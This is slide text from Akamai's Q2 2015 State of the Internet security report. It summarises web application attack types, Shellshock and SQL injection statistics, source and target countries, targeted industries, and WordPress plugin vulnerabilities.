[Q2 2015] web application attacks
akamai.com
= 9 web application attack vectors In Q2 2015, Akamai reported on nine different web application attack vectors: SQLi / SQL injection: User content is passed to an SQL statement without proper validation
LFI / Local file inclusion: Gains unauthorized read access to local files on the web server RFI / Remote file inclusion: Abuse of the dynamic file include mechanism available in many programming languages to load remote malicious code into the victim web application PHPi / PHP injection: Injects PHP code that gets executed by the PHP interpreter CMDi / Command injection: Executes arbitrary shell commands on the target system JAVAi / Java injection: Abuses the Object Graph Navigation Language (OGNL), a Java expression language. Popular due to recent flaws in the Java-based Struts Framework, which uses OGNL extensively MFU / Malicious file upload (or unrestricted file upload): Uploads unauthorized files to the target application that may be used later to gain full control over the system
XSS / Cross-site scripting: Injects client-side code into web pages viewed by others whose browsers execute the code within the security context (or zone) of the hosting site. Reads, modifies and/or transmits data accessible by the browser Shellshock / Disclosed in September 2014: A vulnerability in the Bash shell (the default shell for Linux and mac OS X) that allows for arbitrary command execution by a remote attacker
2 / [The State of the Internet] / Security (Q2 2015)
= Shellshock attacks
• Shellshock accounted for 49% of web application attacks in Q2 2015 • 95% of Shellshock attacks targeted a single financial services firm
• 95% of all attacks over HTTPS in April were attributed to Shellshock • 173 million total Shellshock attacks against Akamai customers in Q2
• The high rate of Shellshock attacks shifted the balance between HTTPS and HTTP channels • 56% of attacks were over HTTPS in Q2 2015, compared to 9% in Q1 • Shellshock attacks are carried out over HTTPS 96% of the time
3 / [The State of the Internet] / Security (Q2 2015)
= other common attack vectors
• SQLi attacks accounted for 26% of all web application attacks • Discounting Shellshock attacks, SQLi totaled 55% percent of attacks • More than 92 million SQLi attacks in Q2 2015 • The number of SQLi alerts increased by 75% over Q1 2015
• LFI attacks accounted for 18% of all web application attacks • 63 million alerts in Q2 2015, compared to 75 million in Q1
• The remaining six vectors accounted for 7% of all web application attacks
4 / [The State of the Internet] / Security (Q2 2015)
= top 10 source countries
China was the source of more than half of attacking IPs, with the US in second place. Countries with a higher population and higher connectivity are often the source of attack traffic. 7 / [The State of the Internet] / Security (Q2 2015)
= top 10 target countries
Websites based in the US were the most common targets for web application attacks in Q2 2015. The US is consistently one of the top targets for malicious actors. 7 / [The State of the Internet] / Security (Q2 2015)
= targeted industries
• Retail and financial service were subject to the greatest number of malicious requests • Shift from Q1 2015, when retail and media/entertainment sectors were the most popular targets • Shellshock attacks are not included because of their focus on a single company
• SQLi and LFI were the most common attack vectors for retail and financial services • XSS attacks also targeted primarily retail and financial services • RFI attacks were mostly used against financial services and hotel/travel • MFU attacks overwhelmingly targeted the hotel and travel industry • PHPi attacks focused on targets in retail and the public sector
3 / [The State of the Internet] / Security (Q2 2015)
= WordPress plugin vulnerabilities
• The popularity of the WordPress platform has made it a popular target • Third-party plugins and themes create vulnerabilities • Third-party developers have varying levels of skill • Plugins from third-party websites may not be carefully vetted • Updates to plugins and themes do not undergo stringent review
• Akamai tested 1,322 plugins and themes • 25 had one or more vulnerabilities, for a total of 49 potential exploits • Most common vulnerabilities were XSS, LFI, and path transversal (PT) exploits, along with email header injection.
• Recommendations for hardening found in the Q2 2015 SOTI Security Report
5 / [The State of the Internet] / Security (Q2 2015)
= Q1 2015 State of the Internet –Security Report
Download the Q2 2015 State of the Internet Security Report • The Q2 2015 report covers: ⁄ ⁄ ⁄ ⁄ ⁄ ⁄ ⁄ ⁄
Analysis of DDoS and web application attack trends Bandwidth (Gbps) and volume (Mpps) statistics Year-over-year and quarter-by-quarter analysis Attack frequency, size, types and sources Multi-vector mega attacks leveraging UPD and SYN floods Dangers of third-party WordPress plugins and themes Analysis of the Onion Router (Tor) project risks Threat advisories issued in Q2 2015, including OurMine Team and RIPv1
9 / [The State of the Internet] / Security (Q2 2015)
= about stateoftheinternet.com
•
StateoftheInternet.com, brought to you by Akamai, serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.
•
Visitors to www.stateoftheinternet.com can find current and archived versions of Akamai’s State of the Internet (Connectivity and Security) reports, the company’s data visualizations, and other resources designed to put context around the ever-changing Internet landscape.
10 / [The State of the Internet] / Security (Q2 2015)